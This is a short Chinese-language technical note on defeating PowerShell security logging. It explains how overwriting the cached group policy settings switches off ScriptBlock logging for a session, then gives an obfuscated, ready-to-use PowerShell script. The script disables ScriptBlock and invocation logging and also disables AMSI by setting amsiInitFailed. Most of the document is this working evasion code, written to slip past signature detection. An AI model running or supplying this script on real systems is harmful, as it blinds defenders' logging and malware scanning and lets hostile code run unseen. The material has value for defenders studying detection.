参考:
PowerShell ScriptBlock Logging Bypass
In Windows 10 / PowerShell 5.0, Microsoft introduced several new security features in PowerShell. These included the AMSI, Protected Event Logging, and maybe most importantly ScriptBlock logging.
1
Get-WinEvent -FilterHashtable @{ProviderName="Microsoft-Windows-PowerShell"; Id=4104}
每当powershell发现一个ScriptBlock,就会查询Group Policy setting是否需要记日志;如果设置了System.Management.Automation.Utils中的cachedGroupPolicySettings`,powershell会直接读取缓存的查询结果。
通过将查询结果赋值为”不记入日志”来临时关闭ScriptBlockLogging,此设置只对当前powershell session有效,并且并没有实际修改组策略、注册表中的设置。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
// 混淆版本,同时关闭ScriptBlockLogging和AMSI
If($PSVerSioNTaBle.PSVERSiON.MAjOr -gE 3){
$GPF=[reF].AssemBLy.GeTTypE('System.Management.Automation.Utils')."GetFiE`ld"('cachedGroupPolicySettings','N'+'onPublic,Static');
If($GPF){
$GPC=$GPF.GEtVaLue($NUll);
IF($GPC['ScriptB'+'lockLogging']){
$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;
$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0
}
$vAL=[CoLleCtIONS.GeNERic.DicTIonaRy[sTRIng,SystEM.ObjEct]]::NEw();
$vaL.ADD('EnableScriptB'+'lockLogging',0);
$VaL.Add('EnableScriptBlockInvocationLogging',0);
$GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$VAl
} ELse{
[SCrIptBloCK]."GeTFiE`LD"('signatures','N'+'onPublic,Static').SETVALUE($NUll,(NeW-ObjecT COLlectionS.GENeRic.HashSet[StRing]))}
[ReF].ASsEmBly.GETTYpE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GEtFIELD('amsiInitFailed','NonPublic,Static').SeTVALUE($nUll,$true)};
}
